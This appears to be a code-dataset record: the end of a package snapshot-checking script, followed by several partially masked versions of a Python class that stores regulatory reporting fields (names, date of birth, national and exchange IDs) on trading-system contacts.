path.as_posix()], stdout=subprocess.DEVNULL)\n except subprocess.CalledProcessError as e:\n raise SnapshotMismatchError(f\"Path {path} cannot be imported: {e}\") from None\n\n\ndef run_import(path: Path) -> None:\n \"\"\"\n Check output by installing and importing it.\n \"\"\"\n if not (path / \"__main__.py\").exists():\n return\n try:\n subprocess.check_call(\n [sys.executable, \"-m\", \"pip\", \"install\", \"--no-input\", path.parent.as_posix()],\n stdout=subprocess.DEVNULL,\n )\n if (path / \"__main__.py\").exists():\n subprocess.check_call(\n [sys.executable, \"-c\", f\"import {path.name}\"],\n stdout=subprocess.DEVNULL,\n )\n subprocess.check_call(\n [sys.executable, \"-m\", \"pip\", \"uninstall\", \"--no-input\", \"-y\", path.name],\n stdout=subprocess.DEVNULL,\n )\n except subprocess.CalledProcessError as e:\n raise SnapshotMismatchError(f\"Path {path} cannot be imported: {e}\") from None\n\n\ndef is_package_dir(path: Path) -> bool:\n \"\"\"\n Check whether `path` contains a service package.\n \"\"\"\n if not path.is_dir():\n return False\n if path.name.endswith(\".egg-info\"):\n return False\n if (path / \"__init__.pyi\").exists():\n return True\n return False\n\n\ndef check_snapshot(path: Path) -> None:\n \"\"\"\n Check package type checkers snapshot.\n\n Raises:\n SnapshotMismatchError -- If snapshot is not equal to current output.\n \"\"\"\n logger = logging.getLogger(LOGGER_NAME)\n logger.debug(f\"Running flake8 for {path.name} ...\")\n run_flake8(path)\n logger.debug(f\"Running mypy for {path.name} ...\")\n run_mypy(path)\n logger.debug(f\"Running pyright for {path.name} ...\")\n run_pyright(path)\n\n if (path / \"__main__.py\").exists():\n logger.debug(f\"Running call for {path.name} ...\")\n run_call(path)\n logger.debug(f\"Running import for {path.name} ...\")\n run_import(path)\n\n\ndef find_package_path(path: Path) -> Optional[Path]:\n \"\"\"\n Find package directory inside `path`.\n \"\"\"\n for package_path in path.iterdir():\n if is_package_dir(package_path):\n return package_path\n\n\ndef main() -> None:\n \"\"\"\n Run main logic.\n \"\"\"\n args = parse_args()\n logger = setup_logging(logging.DEBUG if args.debug else logging.INFO)\n has_errors = False\n for folder in sorted(args.path.iterdir()):\n if not folder.name.endswith(\"_package\"):\n continue\n\n if args.filter and not any(s in folder.as_posix() for s in args.filter):\n continue\n\n package_path = find_package_path(folder)\n if not package_path:\n continue\n logger.info(f\"Checking {folder.name}/{package_path.name} ...\")\n try:\n check_snapshot(package_path)\n except SnapshotMismatchError as e:\n logger.error(e)\n has_errors = True\n if args.exit_on_error:\n break\n\n if has_errors:\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n",
"step-ids": [
13,
14,
16,
17,
19
]
}
|
[
13,
14,
16,
17,
19
] |
<|reserved_special_token_0|>
class FContactRegulatoryInfoBase(object):
def __init__(self, contact=None):
"""class that maintains all data related to the regulatory on the FContact"""
try:
self.__contact = contact
if not self.__contact:
FRegulatoryLogger.ERROR(logger,
'The name on the contact is the unique identifier of the contact. Kindly provide a valid acm.FContact object'
)
return None
self.__reg_date_of_birth = None
self.__reg_first_name = None
self.__reg_last_name = None
self.__reg_national_id = None
self.__reg_crm_id = None
self.__crm_id_source = None
self.__reg_exchange_id = None
self.__reg_unique_name = None
self.__client_type = None
self.__is_general_partner = None
if contact:
self.__refresh(contact)
self.__integration_utils = FIntegrationUtils.FIntegrationUtils()
except Exception as e:
FRegulatoryLogger.ERROR(logger, str(e))
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def DateOfBirth(self, reg_date_of_birth=VALUE_NOT_SET):
"""Date of birth of the concerned natural person"""
ael_reg_dob = None
if reg_date_of_birth != VALUE_NOT_SET:
try:
ael_reg_dob = ael.date_from_string(reg_date_of_birth)
except:
if reg_date_of_birth not in ['', None]:
msg = (
'The value <%s> provided for DateOfBirth is invalid and hence will not be set of the DateOfBirth AdditionalInfo'
% reg_date_of_birth)
FRegulatoryLogger.ERROR(logger, msg)
raise FRegulatoryInfoException.FRegInfoInvalidData(msg)
if ael_reg_dob:
self.__reg_date_of_birth = reg_date_of_birth
else:
self.__reg_date_of_birth = None
try:
self.__contact.AdditionalInfo().DateOfBirth(self.
__reg_date_of_birth)
except:
pass
else:
return self.__reg_date_of_birth
def FirstName(self, reg_first_name=VALUE_NOT_SET):
"""First name of the concerned natural person"""
if reg_first_name != VALUE_NOT_SET:
self.__reg_first_name = reg_first_name
try:
self.__contact.AdditionalInfo().FirstName(self.__reg_first_name
)
except:
pass
else:
if not self.__reg_first_name:
self.__reg_first_name = None
return self.__reg_first_name
def LastName(self, reg_last_name=VALUE_NOT_SET):
"""Last name of the concerned natural person"""
if reg_last_name != VALUE_NOT_SET:
self.__reg_last_name = reg_last_name
try:
self.__contact.AdditionalInfo().LastName(self.__reg_last_name)
except:
pass
else:
if not self.__reg_last_name:
self.__reg_last_name = None
return self.__reg_last_name
def NationalId(self, reg_national_id=VALUE_NOT_SET):
"""NationalId of the concerned natural person"""
if reg_national_id != VALUE_NOT_SET:
self.__reg_national_id = reg_national_id
try:
self.__contact.AdditionalInfo().NationalId(self.
__reg_national_id)
except:
pass
else:
if not self.__reg_national_id:
self.__reg_national_id = None
return self.__reg_national_id
def CrmId(self, crm_id=VALUE_NOT_SET):
"""CrmId of the concerned natural person"""
if crm_id != VALUE_NOT_SET:
self.__reg_crm_id = crm_id
try:
self.__contact.AdditionalInfo().RegContactCrmId(self.
__reg_crm_id)
except:
pass
else:
if not self.__reg_crm_id:
self.__reg_crm_id = None
return self.__reg_crm_id
<|reserved_special_token_0|>
def UniqueName(self, unique_name=VALUE_NOT_SET):
"""An optional unique name, if specified there can only be one contact with this name for each party."""
if unique_name != VALUE_NOT_SET:
try:
if (FIntegrationUtils.FIntegrationUtils.
get_acm_version_override() >= 2017.2):
self.__contact.UniqueName(unique_name)
else:
is_unique, contact_name = FRegulatoryUtils.is_unique_name(
self.__contact, unique_name)
if is_unique:
try:
self.__contact.AdditionalInfo().UniqueName(
unique_name)
except:
pass
else:
msg = (
'The uniqueName <%s> provided for contact <%s> on party <%s> is not unique. Another contact <%s> already has this unique name.'
% (unique_name, self.__contact.Fullname(),
self.__contact.Party().Name(), contact_name))
FRegulatoryLogger.ERROR(logger, msg)
raise FRegulatoryInfoException.FRegInfoInvalidData(msg)
self.__reg_unique_name = unique_name
except Exception as e:
FRegulatoryLogger.ERROR(logger, str(e))
raise FRegulatoryInfoException.FRegInfoInvalidData(str(e))
else:
if not self.__reg_unique_name:
self.__reg_unique_name = None
return self.__reg_unique_name
def ClientType(self):
"""returns the ClientType based on where the CrmId is found on the linked objects"""
self.__client_type = FRegulatoryUtils.getClientType(self.__contact)
return self.__client_type
<|reserved_special_token_0|>
def IsGeneralPartner(self, is_general_partner=VALUE_NOT_SET):
"""General partner has responsibility for the actions of the business, can legally bind
the business and is personally liable for all the business's debts and obligations."""
if is_general_partner != VALUE_NOT_SET:
self.__is_general_partner = FRegulatoryUtils.get_bool(
is_general_partner, 'IsGeneralPartner')
FRegulatoryLogger.DEBUG(logger,
'The IsGeneralPartner is being set to <%s>.' % str(self.
__is_general_partner))
try:
self.__contact.AdditionalInfo().RegGeneralPartner(self.
__is_general_partner)
except:
pass
else:
if str(self.__is_general_partner) == 'None':
FRegulatoryLogger.DEBUG(logger,
'The IsGeneralPartner is None. Hence defaulting it to False'
)
self.__is_general_partner = False
return self.__is_general_partner
def __setattr__(self, attr, val):
if attr.startswith('_'):
super(FContactRegulatoryInfoBase, self).__setattr__(attr, val)
elif hasattr(self, attr):
getattr(self, attr)(val)
<|reserved_special_token_0|>
def Delete(self):
"""Deleting this instance automatically deletes all the attributes related to the reporting on the instrument or on the ContactRegulatoryInfo in the ADS"""
FRegulatoryUtils.Delete(self.__contact, 'Contact')
FRegulatoryLogger.DEBUG(logger,
'Deleted all AdditionalInfos on Contact related to Regulatory Reporting'
)
def Attributes(self):
"""returns the attributes on the FContactRegulatoryInfoBase instance"""
return FRegulatoryUtils.log_attributes('FContactRegulatoryInfo', self)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class FContactRegulatoryInfoBase(object):
def __init__(self, contact=None):
"""class that maintains all data related to the regulatory on the FContact"""
try:
self.__contact = contact
if not self.__contact:
FRegulatoryLogger.ERROR(logger,
'The name on the contact is the unique identifier of the contact. Kindly provide a valid acm.FContact object'
)
return None
self.__reg_date_of_birth = None
self.__reg_first_name = None
self.__reg_last_name = None
self.__reg_national_id = None
self.__reg_crm_id = None
self.__crm_id_source = None
self.__reg_exchange_id = None
self.__reg_unique_name = None
self.__client_type = None
self.__is_general_partner = None
if contact:
self.__refresh(contact)
self.__integration_utils = FIntegrationUtils.FIntegrationUtils()
except Exception as e:
FRegulatoryLogger.ERROR(logger, str(e))
def __refresh(self, contact):
self.__reg_date_of_birth = FRegulatoryUtils.get_addinfo_value(
'dateOfBirth', self.__contact)
self.__reg_first_name = FRegulatoryUtils.get_addinfo_value('firstName',
self.__contact)
self.__reg_last_name = FRegulatoryUtils.get_addinfo_value('lastName',
self.__contact)
self.__reg_national_id = FRegulatoryUtils.get_addinfo_value(
'nationalId', self.__contact)
self.__is_general_partner = FRegulatoryUtils.get_addinfo_value(
'regGeneralPartner', self.__contact)
self.__reg_crm_id = FRegulatoryUtils.get_addinfo_value(
'regContactCrmId', self.__contact)
self.__reg_exchange_id = FRegulatoryUtils.get_addinfo_value(
'regContExchangeId', self.__contact)
try:
self.__reg_unique_name = self.__contact.UniqueName()
except:
self.__reg_unique_name = FRegulatoryUtils.get_addinfo_value(
'uniqueName', self.__contact)
<|reserved_special_token_0|>
def DateOfBirth(self, reg_date_of_birth=VALUE_NOT_SET):
"""Date of birth of the concerned natural person"""
ael_reg_dob = None
if reg_date_of_birth != VALUE_NOT_SET:
try:
ael_reg_dob = ael.date_from_string(reg_date_of_birth)
except:
if reg_date_of_birth not in ['', None]:
msg = (
'The value <%s> provided for DateOfBirth is invalid and hence will not be set of the DateOfBirth AdditionalInfo'
% reg_date_of_birth)
FRegulatoryLogger.ERROR(logger, msg)
raise FRegulatoryInfoException.FRegInfoInvalidData(msg)
if ael_reg_dob:
self.__reg_date_of_birth = reg_date_of_birth
else:
self.__reg_date_of_birth = None
try:
self.__contact.AdditionalInfo().DateOfBirth(self.
__reg_date_of_birth)
except:
pass
else:
return self.__reg_date_of_birth
def FirstName(self, reg_first_name=VALUE_NOT_SET):
"""First name of the concerned natural person"""
if reg_first_name != VALUE_NOT_SET:
self.__reg_first_name = reg_first_name
try:
self.__contact.AdditionalInfo().FirstName(self.__reg_first_name
)
except:
pass
else:
if not self.__reg_first_name:
self.__reg_first_name = None
return self.__reg_first_name
def LastName(self, reg_last_name=VALUE_NOT_SET):
"""Last name of the concerned natural person"""
if reg_last_name != VALUE_NOT_SET:
self.__reg_last_name = reg_last_name
try:
self.__contact.AdditionalInfo().LastName(self.__reg_last_name)
except:
pass
else:
if not self.__reg_last_name:
self.__reg_last_name = None
return self.__reg_last_name
def NationalId(self, reg_national_id=VALUE_NOT_SET):
"""NationalId of the concerned natural person"""
if reg_national_id != VALUE_NOT_SET:
self.__reg_national_id = reg_national_id
try:
self.__contact.AdditionalInfo().NationalId(self.
__reg_national_id)
except:
pass
else:
if not self.__reg_national_id:
self.__reg_national_id = None
return self.__reg_national_id
def CrmId(self, crm_id=VALUE_NOT_SET):
"""CrmId of the concerned natural person"""
if crm_id != VALUE_NOT_SET:
self.__reg_crm_id = crm_id
try:
self.__contact.AdditionalInfo().RegContactCrmId(self.
__reg_crm_id)
except:
pass
else:
if not self.__reg_crm_id:
self.__reg_crm_id = None
return self.__reg_crm_id
def ExchangeId(self, exchange_id=VALUE_NOT_SET):
"""The identifier used towards/by an exchange to identify a person or legal entity, before the actual national id or the LEI is divulged."""
if exchange_id != VALUE_NOT_SET:
if str(exchange_id).isdigit():
self.__reg_exchange_id = int(exchange_id)
elif str(exchange_id) in ['None', '']:
self.__reg_exchange_id = None
else:
msg = (
'The ExchangeId provided <%s> is not of the expected integer format'
% str(exchange_id))
FRegulatoryLogger.ERROR(logger, msg)
raise FRegulatoryInfoException.FRegInfoInvalidData(msg)
try:
self.__contact.AdditionalInfo().RegContExchangeId(self.
__reg_exchange_id)
except:
pass
else:
if not self.__reg_exchange_id:
self.__reg_exchange_id = None
return self.__reg_exchange_id
def UniqueName(self, unique_name=VALUE_NOT_SET):
"""An optional unique name, if specified there can only be one contact with this name for each party."""
if unique_name != VALUE_NOT_SET:
try:
if (FIntegrationUtils.FIntegrationUtils.
get_acm_version_override() >= 2017.2):
self.__contact.UniqueName(unique_name)
else:
is_unique, contact_name = FRegulatoryUtils.is_unique_name(
self.__contact, unique_name)
if is_unique:
try:
self.__contact.AdditionalInfo().UniqueName(
unique_name)
except:
pass
else:
msg = (
'The uniqueName <%s> provided for contact <%s> on party <%s> is not unique. Another contact <%s> already has this unique name.'
% (unique_name, self.__contact.Fullname(),
self.__contact.Party().Name(), contact_name))
FRegulatoryLogger.ERROR(logger, msg)
raise FRegulatoryInfoException.FRegInfoInvalidData(msg)
self.__reg_unique_name = unique_name
except Exception as e:
FRegulatoryLogger.ERROR(logger, str(e))
raise FRegulatoryInfoException.FRegInfoInvalidData(str(e))
else:
if not self.__reg_unique_name:
self.__reg_unique_name = None
return self.__reg_unique_name
def ClientType(self):
"""returns the ClientType based on where the CrmId is found on the linked objects"""
self.__client_type = FRegulatoryUtils.getClientType(self.__contact)
return self.__client_type
<|reserved_special_token_0|>
def IsGeneralPartner(self, is_general_partner=VALUE_NOT_SET):
"""General partner has responsibility for the actions of the business, can legally bind
the business and is personally liable for all the business's debts and obligations."""
if is_general_partner != VALUE_NOT_SET:
self.__is_general_partner = FRegulatoryUtils.get_bool(
is_general_partner, 'IsGeneralPartner')
FRegulatoryLogger.DEBUG(logger,
'The IsGeneralPartner is being set to <%s>.' % str(self.
__is_general_partner))
try:
self.__contact.AdditionalInfo().RegGeneralPartner(self.
__is_general_partner)
except:
pass
else:
if str(self.__is_general_partner) == 'None':
FRegulatoryLogger.DEBUG(logger,
'The IsGeneralPartner is None. Hence defaulting it to False'
)
self.__is_general_partner = False
return self.__is_general_partner
def __setattr__(self, attr, val):
if attr.startswith('_'):
super(FContactRegulatoryInfoBase, self).__setattr__(attr, val)
elif hasattr(self, attr):
getattr(self, attr)(val)
<|reserved_special_token_0|>
def Delete(self):
"""Deleting this instance automatically deletes all the attributes related to the reporting on the instrument or on the ContactRegulatoryInfo in the ADS"""
FRegulatoryUtils.Delete(self.__contact, 'Contact')
FRegulatoryLogger.DEBUG(logger,
'Deleted all AdditionalInfos on Contact related to Regulatory Reporting'
)
def Attributes(self):
"""returns the attributes on the FContactRegulatoryInfoBase instance"""
return FRegulatoryUtils.log_attributes('FContactRegulatoryInfo', self)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class FContactRegulatoryInfoBase(object):
def __init__(self, contact=None):
"""class that maintains all data related to the regulatory on the FContact"""
try:
self.__contact = contact
if not self.__contact:
FRegulatoryLogger.ERROR(logger,
'The name on the contact is the unique identifier of the contact. Kindly provide a valid acm.FContact object'
)
return None
self.__reg_date_of_birth = None
self.__reg_first_name = None
self.__reg_last_name = None
self.__reg_national_id = None
self.__reg_crm_id = None
self.__crm_id_source = None
self.__reg_exchange_id = None
self.__reg_unique_name = None
self.__client_type = None
self.__is_general_partner = None
if contact:
self.__refresh(contact)
self.__integration_utils = FIntegrationUtils.FIntegrationUtils()
except Exception as e:
FRegulatoryLogger.ERROR(logger, str(e))
def __refresh(self, contact):
self.__reg_date_of_birth = FRegulatoryUtils.get_addinfo_value(
'dateOfBirth', self.__contact)
self.__reg_first_name = FRegulatoryUtils.get_addinfo_value('firstName',
self.__contact)
self.__reg_last_name = FRegulatoryUtils.get_addinfo_value('lastName',
self.__contact)
self.__reg_national_id = FRegulatoryUtils.get_addinfo_value(
'nationalId', self.__contact)
self.__is_general_partner = FRegulatoryUtils.get_addinfo_value(
'regGeneralPartner', self.__contact)
self.__reg_crm_id = FRegulatoryUtils.get_addinfo_value(
'regContactCrmId', self.__contact)
self.__reg_exchange_id = FRegulatoryUtils.get_addinfo_value(
'regContExchangeId', self.__contact)
try:
self.__reg_unique_name = self.__contact.UniqueName()
except:
self.__reg_unique_name = FRegulatoryUtils.get_addinfo_value(
'uniqueName', self.__contact)
def Contact(self):
"""returns the contact for which this wrapper has all the addinfo/column values"""
return self.__contact
def DateOfBirth(self, reg_date_of_birth=VALUE_NOT_SET):
"""Date of birth of the concerned natural person"""
ael_reg_dob = None
if reg_date_of_birth != VALUE_NOT_SET:
try:
ael_reg_dob = ael.date_from_string(reg_date_of_birth)
except:
if reg_date_of_birth not in ['', None]:
msg = (
'The value <%s> provided for DateOfBirth is invalid and hence will not be set of the DateOfBirth AdditionalInfo'
% reg_date_of_birth)
FRegulatoryLogger.ERROR(logger, msg)
raise FRegulatoryInfoException.FRegInfoInvalidData(msg)
if ael_reg_dob:
self.__reg_date_of_birth = reg_date_of_birth
else:
self.__reg_date_of_birth = None
try:
self.__contact.AdditionalInfo().DateOfBirth(self.
__reg_date_of_birth)
except:
pass
else:
return self.__reg_date_of_birth
def FirstName(self, reg_first_name=VALUE_NOT_SET):
"""First name of the concerned natural person"""
if reg_first_name != VALUE_NOT_SET:
self.__reg_first_name = reg_first_name
try:
self.__contact.AdditionalInfo().FirstName(self.__reg_first_name
)
except:
pass
else:
if not self.__reg_first_name:
self.__reg_first_name = None
return self.__reg_first_name
def LastName(self, reg_last_name=VALUE_NOT_SET):
"""Last name of the concerned natural person"""
if reg_last_name != VALUE_NOT_SET:
self.__reg_last_name = reg_last_name
try:
self.__contact.AdditionalInfo().LastName(self.__reg_last_name)
except:
pass
else:
if not self.__reg_last_name:
self.__reg_last_name = None
return self.__reg_last_name
def NationalId(self, reg_national_id=VALUE_NOT_SET):
"""NationalId of the concerned natural person"""
if reg_national_id != VALUE_NOT_SET:
self.__reg_national_id = reg_national_id
try:
self.__contact.AdditionalInfo().NationalId(self.
__reg_national_id)
except:
pass
else:
if not self.__reg_national_id:
self.__reg_national_id = None
return self.__reg_national_id
def CrmId(self, crm_id=VALUE_NOT_SET):
"""CrmId of the concerned natural person"""
if crm_id != VALUE_NOT_SET:
self.__reg_crm_id = crm_id
try:
self.__contact.AdditionalInfo().RegContactCrmId(self.
__reg_crm_id)
except:
pass
else:
if not self.__reg_crm_id:
self.__reg_crm_id = None
return self.__reg_crm_id
def ExchangeId(self, exchange_id=VALUE_NOT_SET):
"""The identifier used towards/by an exchange to identify a person or legal entity, before the actual national id or the LEI is divulged."""
if exchange_id != VALUE_NOT_SET:
if str(exchange_id).isdigit():
self.__reg_exchange_id = int(exchange_id)
elif str(exchange_id) in ['None', '']:
self.__reg_exchange_id = None
else:
msg = (
'The ExchangeId provided <%s> is not of the expected integer format'
% str(exchange_id))
FRegulatoryLogger.ERROR(logger, msg)
raise FRegulatoryInfoException.FRegInfoInvalidData(msg)
try:
self.__contact.AdditionalInfo().RegContExchangeId(self.
__reg_exchange_id)
except:
pass
else:
if not self.__reg_exchange_id:
self.__reg_exchange_id = None
return self.__reg_exchange_id
def UniqueName(self, unique_name=VALUE_NOT_SET):
"""An optional unique name, if specified there can only be one contact with this name for each party."""
if unique_name != VALUE_NOT_SET:
try:
if (FIntegrationUtils.FIntegrationUtils.
get_acm_version_override() >= 2017.2):
self.__contact.UniqueName(unique_name)
else:
is_unique, contact_name = FRegulatoryUtils.is_unique_name(
self.__contact, unique_name)
if is_unique:
try:
self.__contact.AdditionalInfo().UniqueName(
unique_name)
except:
pass
else:
msg = (
'The uniqueName <%s> provided for contact <%s> on party <%s> is not unique. Another contact <%s> already has this unique name.'
% (unique_name, self.__contact.Fullname(),
self.__contact.Party().Name(), contact_name))
FRegulatoryLogger.ERROR(logger, msg)
raise FRegulatoryInfoException.FRegInfoInvalidData(msg)
self.__reg_unique_name = unique_name
except Exception as e:
FRegulatoryLogger.ERROR(logger, str(e))
raise FRegulatoryInfoException.FRegInfoInvalidData(str(e))
else:
if not self.__reg_unique_name:
self.__reg_unique_name = None
return self.__reg_unique_name
def ClientType(self):
"""returns the ClientType based on where the CrmId is found on the linked objects"""
self.__client_type = FRegulatoryUtils.getClientType(self.__contact)
return self.__client_type
def JointAccount(self):
"""Another trader that jointly owns the account with this trader"""
joint_accounts = []
if self.IsGeneralPartner():
for contact in self.__contact.Party().Contacts():
if contact.AdditionalInfo().RegGeneralPartner():
joint_accounts.append(contact)
else:
FRegulatoryLogger.WARN(logger,
'<%s> is not a General Partner. Hence JointAccount is None' %
self.__contact.Fullname())
joint_accounts = None
return joint_accounts
def IsGeneralPartner(self, is_general_partner=VALUE_NOT_SET):
"""General partner has responsibility for the actions of the business, can legally bind
the business and is personally liable for all the business's debts and obligations."""
if is_general_partner != VALUE_NOT_SET:
self.__is_general_partner = FRegulatoryUtils.get_bool(
is_general_partner, 'IsGeneralPartner')
FRegulatoryLogger.DEBUG(logger,
'The IsGeneralPartner is being set to <%s>.' % str(self.
__is_general_partner))
try:
self.__contact.AdditionalInfo().RegGeneralPartner(self.
__is_general_partner)
except:
pass
else:
if str(self.__is_general_partner) == 'None':
FRegulatoryLogger.DEBUG(logger,
'The IsGeneralPartner is None. Hence defaulting it to False'
)
self.__is_general_partner = False
return self.__is_general_partner
def __setattr__(self, attr, val):
if attr.startswith('_'):
super(FContactRegulatoryInfoBase, self).__setattr__(attr, val)
elif hasattr(self, attr):
getattr(self, attr)(val)
def Commit(self):
"""Committing this instance will automatically commit all the RegulatorySupport related attributes on the contact"""
try:
acm.BeginTransaction()
self.__contact.Commit()
if FIntegrationUtils.FIntegrationUtils.get_acm_version_override(
) < 2015.4:
self.__integration_utils.set_additional_info('DateOfBirth',
self.__contact, self.__reg_date_of_birth)
self.__integration_utils.set_additional_info('FirstName',
self.__contact, self.__reg_first_name)
self.__integration_utils.set_additional_info('LastName',
self.__contact, self.__reg_last_name)
self.__integration_utils.set_additional_info('NationalId',
self.__contact, self.__reg_national_id)
self.__integration_utils.set_additional_info('RegContactCrmId',
self.__contact, self.__reg_crm_id)
self.__integration_utils.set_additional_info(
'RegContExchangeId', self.__contact, self.__reg_exchange_id
)
self.__integration_utils.set_additional_info('UniqueName',
self.__contact, self.__reg_unique_name)
self.__integration_utils.set_additional_info(
'RegGeneralPartner', self.__contact, self.
__is_general_partner)
acm.CommitTransaction()
except Exception as e:
FRegulatoryLogger.ERROR(logger, str(e))
FRegulatoryLogger.ERROR(logger, 'ABORTING TRANSACTION***********')
acm.AbortTransaction()
def Delete(self):
"""Deleting this instance automatically deletes all the attributes related to the reporting on the instrument or on the ContactRegulatoryInfo in the ADS"""
FRegulatoryUtils.Delete(self.__contact, 'Contact')
FRegulatoryLogger.DEBUG(logger,
'Deleted all AdditionalInfos on Contact related to Regulatory Reporting'
)
def Attributes(self):
"""returns the attributes on the FContactRegulatoryInfoBase instance"""
return FRegulatoryUtils.log_attributes('FContactRegulatoryInfo', self)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class FContactRegulatoryInfoBase(object):
def __init__(self, contact=None):
"""class that maintains all data related to the regulatory on the FContact"""
try:
self.__contact = contact
if not self.__contact:
FRegulatoryLogger.ERROR(logger,
'The name on the contact is the unique identifier of the contact. Kindly provide a valid acm.FContact object'
)
return None
self.__reg_date_of_birth = None
self.__reg_first_name = None
self.__reg_last_name = None
self.__reg_national_id = None
self.__reg_crm_id = None
self.__crm_id_source = None
self.__reg_exchange_id = None
self.__reg_unique_name = None
self.__client_type = None
self.__is_general_partner = None
if contact:
self.__refresh(contact)
self.__integration_utils = FIntegrationUtils.FIntegrationUtils()
except Exception as e:
FRegulatoryLogger.ERROR(logger, str(e))
def __refresh(self, contact):
self.__reg_date_of_birth = FRegulatoryUtils.get_addinfo_value(
'dateOfBirth', self.__contact)
self.__reg_first_name = FRegulatoryUtils.get_addinfo_value('firstName',
self.__contact)
self.__reg_last_name = FRegulatoryUtils.get_addinfo_value('lastName',
self.__contact)
self.__reg_national_id = FRegulatoryUtils.get_addinfo_value(
'nationalId', self.__contact)
self.__is_general_partner = FRegulatoryUtils.get_addinfo_value(
'regGeneralPartner', self.__contact)
self.__reg_crm_id = FRegulatoryUtils.get_addinfo_value(
'regContactCrmId', self.__contact)
self.__reg_exchange_id = FRegulatoryUtils.get_addinfo_value(
'regContExchangeId', self.__contact)
try:
self.__reg_unique_name = self.__contact.UniqueName()
except:
self.__reg_unique_name = FRegulatoryUtils.get_addinfo_value(
'uniqueName', self.__contact)
def Contact(self):
"""returns the contact for which this wrapper has all the addinfo/column values"""
return self.__contact
def DateOfBirth(self, reg_date_of_birth=VALUE_NOT_SET):
"""Date of birth of the concerned natural person"""
ael_reg_dob = None
if reg_date_of_birth != VALUE_NOT_SET:
try:
ael_reg_dob = ael.date_from_string(reg_date_of_birth)
except:
if reg_date_of_birth not in ['', None]:
msg = (
'The value <%s> provided for DateOfBirth is invalid and hence will not be set of the DateOfBirth AdditionalInfo'
% reg_date_of_birth)
FRegulatoryLogger.ERROR(logger, msg)
raise FRegulatoryInfoException.FRegInfoInvalidData(msg)
if ael_reg_dob:
self.__reg_date_of_birth = reg_date_of_birth
else:
self.__reg_date_of_birth = None
try:
self.__contact.AdditionalInfo().DateOfBirth(self.
__reg_date_of_birth)
except:
pass
else:
return self.__reg_date_of_birth
def FirstName(self, reg_first_name=VALUE_NOT_SET):
"""First name of the concerned natural person"""
if reg_first_name != VALUE_NOT_SET:
self.__reg_first_name = reg_first_name
try:
self.__contact.AdditionalInfo().FirstName(self.__reg_first_name
)
except:
pass
else:
if not self.__reg_first_name:
self.__reg_first_name = None
return self.__reg_first_name
def LastName(self, reg_last_name=VALUE_NOT_SET):
"""Last name of the concerned natural person"""
if reg_last_name != VALUE_NOT_SET:
self.__reg_last_name = reg_last_name
try:
self.__contact.AdditionalInfo().LastName(self.__reg_last_name)
except:
pass
else:
if not self.__reg_last_name:
self.__reg_last_name = None
return self.__reg_last_name
def NationalId(self, reg_national_id=VALUE_NOT_SET):
"""NationalId of the concerned natural person"""
if reg_national_id != VALUE_NOT_SET:
self.__reg_national_id = reg_national_id
try:
self.__contact.AdditionalInfo().NationalId(self.
__reg_national_id)
except:
pass
else:
if not self.__reg_national_id:
self.__reg_national_id = None
return self.__reg_national_id
def CrmId(self, crm_id=VALUE_NOT_SET):
"""CrmId of the concerned natural person"""
if crm_id != VALUE_NOT_SET:
self.__reg_crm_id = crm_id
try:
self.__contact.AdditionalInfo().RegContactCrmId(self.
__reg_crm_id)
except:
pass
else:
if not self.__reg_crm_id:
self.__reg_crm_id = None
return self.__reg_crm_id
def ExchangeId(self, exchange_id=VALUE_NOT_SET):
"""The identifier used towards/by an exchange to identify a person or legal entity, before the actual national id or the LEI is divulged."""
if exchange_id != VALUE_NOT_SET:
if str(exchange_id).isdigit():
self.__reg_exchange_id = int(exchange_id)
elif str(exchange_id) in ['None', '']:
self.__reg_exchange_id = None
else:
msg = (
'The ExchangeId provided <%s> is not of the expected integer format'
% str(exchange_id))
FRegulatoryLogger.ERROR(logger, msg)
raise FRegulatoryInfoException.FRegInfoInvalidData(msg)
try:
self.__contact.AdditionalInfo().RegContExchangeId(self.
__reg_exchange_id)
except:
pass
else:
if not self.__reg_exchange_id:
self.__reg_exchange_id = None
return self.__reg_exchange_id
def UniqueName(self, unique_name=VALUE_NOT_SET):
"""An optional unique name, if specified there can only be one contact with this name for each party."""
if unique_name != VALUE_NOT_SET:
try:
if (FIntegrationUtils.FIntegrationUtils.
get_acm_version_override() >= 2017.2):
self.__contact.UniqueName(unique_name)
else:
is_unique, contact_name = FRegulatoryUtils.is_unique_name(
self.__contact, unique_name)
if is_unique:
try:
self.__contact.AdditionalInfo().UniqueName(
unique_name)
except:
pass
else:
msg = (
'The uniqueName <%s> provided for contact <%s> on party <%s> is not unique. Another contact <%s> already has this unique name.'
% (unique_name, self.__contact.Fullname(),
self.__contact.Party().Name(), contact_name))
FRegulatoryLogger.ERROR(logger, msg)
raise FRegulatoryInfoException.FRegInfoInvalidData(msg)
self.__reg_unique_name = unique_name
except Exception as e:
FRegulatoryLogger.ERROR(logger, str(e))
raise FRegulatoryInfoException.FRegInfoInvalidData(str(e))
else:
if not self.__reg_unique_name:
self.__reg_unique_name = None
return self.__reg_unique_name
def ClientType(self):
"""returns the ClientType based on where the CrmId is found on the linked objects"""
self.__client_type = FRegulatoryUtils.getClientType(self.__contact)
return self.__client_type
def JointAccount(self):
"""Another trader that jointly owns the account with this trader"""
joint_accounts = []
if self.IsGeneralPartner():
for contact in self.__contact.Party().Contacts():
if contact.AdditionalInfo().RegGeneralPartner():
joint_accounts.append(contact)
else:
FRegulatoryLogger.WARN(logger,
'<%s> is not a General Partner. Hence JointAccount is None' %
self.__contact.Fullname())
joint_accounts = None
return joint_accounts
def IsGeneralPartner(self, is_general_partner=VALUE_NOT_SET):
"""General partner has responsibility for the actions of the business, can legally bind
the business and is personally liable for all the business's debts and obligations."""
if is_general_partner != VALUE_NOT_SET:
self.__is_general_partner = FRegulatoryUtils.get_bool(
is_general_partner, 'IsGeneralPartner')
FRegulatoryLogger.DEBUG(logger,
'The IsGeneralPartner is being set to <%s>.' % str(self.
__is_general_partner))
try:
self.__contact.AdditionalInfo().RegGeneralPartner(self.
__is_general_partner)
except:
pass
else:
if str(self.__is_general_partner) == 'None':
FRegulatoryLogger.DEBUG(logger,
'The IsGeneralPartner is None. Hence defaulting it to False'
)
self.__is_general_partner = False
return self.__is_general_partner
def __setattr__(self, attr, val):
if attr.startswith('_'):
super(FContactRegulatoryInfoBase, self).__setattr__(attr, val)
elif hasattr(self, attr):
getattr(self, attr)(val)
def Commit(self):
